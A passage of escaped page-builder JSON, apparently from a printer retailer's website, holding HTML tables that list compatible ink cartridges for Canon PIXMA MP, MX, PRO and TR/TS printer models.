(Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td 